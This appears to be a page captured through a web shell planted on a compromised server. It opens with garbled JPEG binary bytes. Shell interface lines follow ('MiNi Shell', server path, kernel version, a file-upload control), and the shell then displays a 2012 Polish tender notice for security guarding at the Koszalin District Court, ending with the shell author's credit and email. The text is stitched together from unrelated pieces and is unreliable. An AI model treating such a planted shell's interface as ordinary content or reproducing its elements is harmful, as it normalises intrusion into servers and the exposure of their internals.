JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121107/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121107/436046-N-2012.html

<p class="kh_header"><b>Koszalin: Ochrona osób i mienia w obiektach Sądu Rejonowego w Koszalinie</b><br>
<b>Numer ogłoszenia: 436046 - 2012; data zamieszczenia: 07.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Sąd Rejonowy w Koszalinie , ul. gen. Wł. Andersa 34, 75-950 Koszalin, woj. zachodniopomorskie, tel. 094 3428609, faks (094) 347-69-60, 342-29-07.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Ochrona osób i mienia w obiektach Sądu Rejonowego w Koszalinie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usługi ochrony osób i mienia w obiektach Sądu Rejonowego w Koszalinie przy ul. Wł. Andersa 17, przy ul. A. Grottgera 4 oraz w części obiektu przy ul. Wł. Andersa 34 zajmowanej przez Zespoły Kuratorów Zawodowych, obejmującej:
- stałą bezpośrednią ochronę wykonywaną w dni pracy Sądu w godzinach od 6.30 do 20.00 przez jednego pracownika ochrony posiadającego poświadczenie bezpieczeństwa wymagane przy dostępie do informacji niejawnych opatrzonych klauzulą co najmniej poufne - w obiekcie przy ul. Wł. Andersa 17,
- stałą bezpośrednią ochronę wykonywaną w dni pracy Sądu w godzinach od 9.00 do 14.00 przez jednego pracownika ochrony posiadającego poświadczenie bezpieczeństwa wymagane przy dostępie do informacji niejawnych opatrzonych klauzulą co najmniej poufne - w obiekcie przy ul. Wł. Andersa 17,
- stałą bezpośrednią ochronę wykonywaną w dni pracy Sądu w godzinach od 6.30 do 20.00 przez jednego pracownika ochrony posiadającego poświadczenie bezpieczeństwa wymagane przy dostępie do informacji niejawnych opatrzonych klauzulą co najmniej poufne - w obiekcie przy ul. A. Grottgera 4,
- stałą bezpośrednią ochronę wykonywaną w dni pracy Sądu w godzinach od 9.00 do 14.00 przez jednego pracownika ochrony posiadającego poświadczenie bezpieczeństwa wymagane przy dostępie do informacji niejawnych opatrzonych klauzulą co najmniej poufne - w obiekcie przy ul. Wł. Andersa 34 (część zajmowana przez Zespoły Kuratorów Zawodowych),
- stały dozór sygnałów przesyłanych, gromadzonych i przetwarzanych w elektronicznych urządzeniach i systemach alarmowych - przez wszystkie dni tygodnia, przez 24 godziny na dobę - z obiektów przy ul. Wł. Andersa 17 oraz przy ul. A. Grottgera 4,
- zapewnienie grupy interwencyjnej na pilne wezwanie.
1.	Zakres usługi wykonywanej w obiekcie przy ul. Wł. Andersa 17:
1.1.	pobieranie klucza przed godz. 6.30 od dyżurnego ochrony obiektu przy ul. Wł. Andersa 34 oraz zwrot klucza po zamknięciu obiektu o godz. 20.00 do dyżurnego ochrony obiektu przy ul. Wł. Andersa 34,
1.2.	otwieranie obiektu o godz. 6.30 oraz zamykanie i zabezpieczanie obiektu o godz. 20.00,
1.3.	wydawanie kluczy (za pokwitowaniem) uprawnionym pracownikom Zamawiającego oraz ich odbieranie po zakończeniu pracy,
1.4.	wydawanie kluczy osobom wykonującym usługi utrzymania czystości na terenie obiektu oraz odbieranie od nich kluczy a także rejestrowanie godzin pracy tych osób,
1.5.	kontrola osób wchodzących do budynku pod kątem posiadania niebezpiecznych przedmiotów,
1.6.	wzywanie osób do opuszczenia obiektu w przypadku stwierdzenia braku uprawnień do przebywania na jego terenie lub stwierdzenia zakłócenia porządku,
1.7.	zatrzymanie sprawców czynów zabronionych i przekazanie ich policji,
1.8.	ochrona obiektu przed włamaniem, kradzieżą mienia, dewastacją i innymi zamachami na mienie będące własnością Zamawiającego,
1.9.	zabezpieczanie śladów i innych dowodów czynów zabronionych popełnionych na terenie obiektu,
1.10. sprawdzanie zabezpieczenia obiektu i pomieszczeń, 
1.11. bieżące informowanie Zamawiającego o nieprawidłowościach w zabezpieczeniu mienia,
1.12. działania zmierzające do uniemożliwienia powstania szkód i ich minimalizacji w przypadku wybuchu pożaru i innych zdarzeń losowych,
1.13. monitorowanie drogą radiową obiektu w zakresie powiadomienia o włamaniu i sygnalizacji napadu,
1.14. przyjmowanie sygnałów alarmowych i informacyjnych z dozorowanego obiektu do bazy elektronicznego systemu ostrzegania,
1.15. zdalne kontrolowanie urządzeń alarmowych zainstalowanych w nadzorowanym obiekcie,
1.16. pełne rejestrowanie przychodzących z dozorowanego obiektu sygnałów alarmowo - informacyjnych,
1.17. obsługa monitoringu wizyjnego,
1.18. bezzwłoczne wysyłanie grupy interwencyjnej - patrolu samochodowego, a w razie potrzeby powiadomienie o alarmie dyżurnego Komendy Miejskiej Policji w celu podjęcia wspólnych działań,
1.19. w przypadku zagrożenia bezzwłoczne powiadamianie Centrum Ratownictwa w Koszalinie,
1.20. utrzymanie ładu i porządku publicznego.

2.	Zakres usługi wykonywanej w obiekcie przy ul. A. Grottgera 4:
2.1.	pobieranie klucza przed godz. 6.30 od dyżurnego ochrony obiektu przy ul. Wł. Andersa 34 oraz zwrot klucza po zamknięciu obiektu o godz. 20.00 do dyżurnego ochrony obiektu przy ul. Wł. Andersa 34,
2.2.	otwieranie obiektu o godz. 6.30 oraz zamykanie i zabezpieczanie obiektu o godz. 20.00,
2.3.	wydawanie kluczy (za pokwitowaniem) uprawnionym pracownikom Zamawiającego oraz ich odbieranie po zakończeniu pracy,
2.4.	wydawanie kluczy osobom wykonującym usługi utrzymania czystości na terenie obiektu oraz odbieranie od nich kluczy a także rejestrowanie godzin pracy tych osób,
2.5.	kontrola osób wchodzących do budynku pod kątem posiadania niebezpiecznych przedmiotów,
2.6.	wzywanie osób do opuszczenia obiektu w przypadku stwierdzenia braku uprawnień do przebywania na jego terenie lub stwierdzenia zakłócenia porządku,
2.7.	zatrzymanie sprawców czynów zabronionych i przekazanie ich policji,
2.8.	ochrona obiektu przed włamaniem, kradzieżą mienia, dewastacją i innymi zamachami na mienie będące własnością Zamawiającego,
2.9.	zabezpieczanie śladów i innych dowodów czynów zabronionych popełnionych na terenie obiektu,
2.10. sprawdzanie zabezpieczenia obiektu i pomieszczeń, 
2.11. bieżące informowanie Zamawiającego o nieprawidłowościach w zabezpieczeniu mienia,
2.12. działania zmierzające do uniemożliwienia powstania szkód i ich minimalizacji w przypadku wybuchu pożaru i innych zdarzeń losowych,
2.13. monitorowanie drogą radiową obiektu w zakresie powiadomienia o włamaniu i sygnalizacji napadu,
2.14. przyjmowanie sygnałów alarmowych i informacyjnych z dozorowanego obiektu do bazy elektronicznego systemu ostrzegania,
2.15. zdalne kontrolowanie urządzeń alarmowych zainstalowanych w nadzorowanym obiekcie,
2.16. pełne rejestrowanie przychodzących z dozorowanego obiektu sygnałów alarmowo - informacyjnych,
2.17. obsługa monitoringu wizyjnego,
2.18. bezzwłoczne wysyłanie grupy interwencyjnej - patrolu samochodowego, a w razie potrzeby powiadomienie o alarmie dyżurnego Komendy Miejskiej Policji w celu podjęcia wspólnych działań,
2.19. w przypadku zagrożenia bezzwłoczne powiadamianie Centrum Ratownictwa w Koszalinie,
2.20. utrzymanie ładu i porządku publicznego.
3. Zakres usługi wykonywanej w obiekcie przy ul. Wł. Andersa 34:
3.1.	objęcie ochroną części obiektu zajmowanego przez Zespoły Kuratorów Zawodowych od godziny 9.00 do godziny 14.00,
3.2.	kontrola petentów Zespołów Kuratorów Zawodowych pod kątem posiadania niebezpiecznych przedmiotów,
3.3.	wzywanie osób do opuszczenia obiektu w przypadku stwierdzenia braku uprawnień do przebywania na jego terenie lub stwierdzenia zakłócenia porządku,
3.4.	zatrzymanie sprawców czynów zabronionych i przekazanie ich policji,
3.5.	ochrona pomieszczeń przed włamaniem, kradzieżą mienia, dewastacją i innymi zamachami na mienie będące własnością Zamawiającego,
3.6.	zabezpieczanie śladów i innych dowodów czynów zabronionych,
3.7.	sprawdzanie zabezpieczenia pomieszczeń, 
3.8.	bieżące informowanie Zamawiającego o nieprawidłowościach w zabezpieczeniu mienia,
3.9.	działania zmierzające do uniemożliwienia powstania szkód i ich minimalizacji w przypadku wybuchu pożaru i innych zdarzeń losowych,
3.10. bezzwłoczne wysyłanie grupy interwencyjnej - patrolu samochodowego, a w razie potrzeby powiadomienie o alarmie dyżurnego Komendy Miejskiej Policji w celu podjęcia wspólnych działań,
3.11. w przypadku zagrożenia bezzwłoczne powiadamianie Centrum Ratownictwa w Koszalinie,
3.12. utrzymanie ładu i porządku publicznego.

Pracownicy ochrony skierowani do wykonywania zamówienia winni być jednakowo umundurowani. Mundury powinny posiadać wyraźne oznaczenia firmy świadczącej usługę. Dodatkowo pracownicy powinni posiadać identyfikatory imienne z fotografią..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.01.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli wykonawca wykaże, że posiada Koncesję Ministra Spraw Wewnętrznych i Administracji na prowadzenie działalności gospodarczej w zakresie usług ochrony osób i mienia, wydana na podstawie ustawy z dnia 22 sierpnia 1997 roku o ochronie osób i mienia (t. j. Dz. U. z 2005 r., Nr 145, poz. 1221 z późn. zm.)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli wykonawca wykaże, że w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, wykonał lub wykonuje co najmniej 3 trwające co najmniej 12 miesięcy w ramach jednego kontraktu usługi ochrony fizycznej osób i mienia o wartości nie niższej niż 100.000,00 zł brutto  każda.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeśli wykonawca: 
- wykaże, że posiada na terenie miasta Koszalina minimum cztery grupy interwencyjne wyposażone w samochody, funkcjonujące tak, aby mogły podjąć działania na obiektach objętych ochroną elektroniczną i udzielić wsparcia pracownikom ochrony bezpośrednio realizującym zamówienie w czasie do 10 minut (grupy w składzie 2 pracowników ochrony posiadających licencje, wyposażonych w broń palną, środki przymusu bezpośredniego, środki łączności radiowej)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeśli wykonawca: 
- wskaże do wykonania niniejszego zamówienia 2 osoby w obiekcie przy ul.  Wł. Andersa 17 - 1 osoba w godzinach 6.30 - 20.00 i 1 osoba w godzinach 9.00 - 14.00; 1 osobę w obiekcie przy ul. A. Grottgera 4 - w godzinach 6.30 - 20.00; 1 osobę w obiekcie przy ul. Wł. Andersa 34 (Zespoły Kuratorów Zawodowych) - w godzinach 9.00 - 14.00, z których każda posiada wynikający z jednego kontraktu co najmniej 12 miesięczny staż pracy polegającej na ochronie osób i mienia nabyty w ciągu ostatnich 3 lat licząc od dnia składania ofert oraz poświadczenie bezpieczeństwa wymagane przy dostępie do informacji niejawnych opatrzonych klauzulą co najmniej poufne.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeśli wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na wartość nie mniejszą niż 100.000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - doświadczenie - 30</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://koszalin.so.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sąd Rejonowy w Koszalinie
ul. Wł. Andersa 34
75-626 Koszalin
pok.91, I piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.11.2012 godzina 10:00, miejsce: Sąd Rejonowy w Koszalinie
ul. Wł. Andersa 34
75-626 Koszalin
Biuro Podawcze lub pok.91 (I piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający przewiduje skorzystanie z prawa opcji.
Opcją w przedmiotowym postępowaniu jest możliwość wykorzystania dodatkowo (łącznie w okresie obowiązywania umowy) 80 godzin pracy pracowników ochrony skierowanych bezpośrednio do wykonywania zamówienia. Opcja zostanie wykorzystana wobec konieczności wydłużenia godzin pracy ochrony w związku z prowadzonymi pracami remontowymi, polimeryzacją podłóg czy koniecznością sporadycznego wzmocnienia ochrony przy salach rozpraw.
Skorzystanie z prawa opcji nie stanowi zmiany umowy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com